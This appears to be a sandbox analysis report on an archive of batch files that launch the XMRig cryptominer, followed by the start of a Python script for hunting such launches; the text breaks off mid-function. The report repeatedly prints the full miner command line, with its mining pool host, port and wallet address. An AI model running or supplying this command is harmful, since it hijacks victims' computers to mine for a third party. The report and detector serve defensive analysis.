Analysis Overview
SHA256: 5b06e18380c2c8261419a482e5d54b189bbe9b0feaccd355c3cb1bc4aaedd017
Threat Level: Known bad
The file PUB.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
Xmrig family
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported: 2024-10-25 14:08
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 1189s
Max time network: 1186s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5692 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 1160s
Max time network: 1174s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 800 wrote to memory of 2828 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral15
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 729s
Max time network: 1181s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1076 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.112.168.52.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral17
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 733s
Max time network: 1173s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1016 wrote to memory of 4760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral18
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241023-en
Max time kernel: 732s
Max time network: 1184s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3568 wrote to memory of 3168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral20
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 733s
Max time network: 1183s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4244 wrote to memory of 5052 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 753s
Max time network: 1192s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3444 wrote to memory of 1220 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 1170s
Max time network: 1190s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2696 wrote to memory of 2528 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral19
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 1158s
Max time network: 1174s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 416 wrote to memory of 1216 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 1157s
Max time network: 1174s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 712 wrote to memory of 2564 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:13
Platform: win10ltsc2021-20241023-en
Max time kernel: 155s
Max time network: 282s
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/1080-0-0x000001FF85F80000-0x000001FF85FA0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 740s
Max time network: 1184s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4936 wrote to memory of 4916 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 731s
Max time network: 1183s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1464 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| FR | 20.199.58.43:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win10ltsc2021-20241023-en
Max time kernel: 735s
Max time network: 1174s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1152 wrote to memory of 3772 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted: 2024-10-25 14:08
Reported: 2024-10-25 14:28
Platform: win11-20241007-en
Max time kernel: 734s
Max time network: 1174s
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3568 wrote to memory of 4316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4316-0-0x0000025BC5180000-0x0000025BC51A0000-memory.dmp
memory/4316-1-0x0000025C57340000-0x0000025C57360000-memory.dmp
memory/4316-2-0x0000025C57780000-0x0000025C577A0000-memory.dmp
memory/4316-3-0x0000025C579B0000-0x0000025C579D0000-memory.dmp
memory/4316-4-0x0000025C57780000-0x0000025C577A0000-memory.dmp
memory/4316-5-0x0000025C579B0000-0x0000025C579D0000-memory.dmp
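The repeated pattern across these runs (cmd.exe running a .bat from the user's Temp directory, xmrig.exe launched with `-o pool:port -u wallet -a rx/0 -k`, and SeLockMemoryPrivilege requested by the miner) is directly huntable in process-creation telemetry. The following is an added example, not part of the sandbox report or of xmrig itself: it parses xmrig-style arguments, pulls out the batch launcher, and scores events. Only the two command lines and the pool host:port are taken from the report; the event dicts, their field names (pid, image, cmdline, privileges), the negative samples and the SeLockMemoryPrivilege allow-list are constructed assumptions standing in for real EDR or Sysmon Event ID 1 data.

```python
"""Hunt for xmrig-style miner launches in process-creation telemetry.

Added example, not part of the sandbox report. Only the xmrig command line,
the cmd.exe /c "<bat>" launcher and the pool host:port come from the report;
event schema, negatives and the allow-list are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional

# xmrig flags: -o/--url pool, -u/--user wallet, -p/--pass, -a/--algo,
# -k/--keepalive. Long forms may also be written --flag=value.
VALUE_FLAGS = {"-o": "pool", "--url": "pool", "-u": "wallet", "--user": "wallet",
               "-p": "password", "--pass": "password", "-a": "algo", "--algo": "algo"}
BOOL_FLAGS = {"-k", "--keepalive"}
# Assumption: images legitimately holding SeLockMemoryPrivilege (large pages,
# "Lock pages in memory") in this estate; xmrig requests it for huge pages.
LOCK_MEMORY_ALLOWLIST = {"sqlservr.exe", "vmware-vmx.exe"}


@dataclass
class MinerIoc:
    pool_host: str
    pool_port: Optional[int]
    wallet: Optional[str]
    algo: Optional[str]
    keepalive: bool


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths with spaces whole."""
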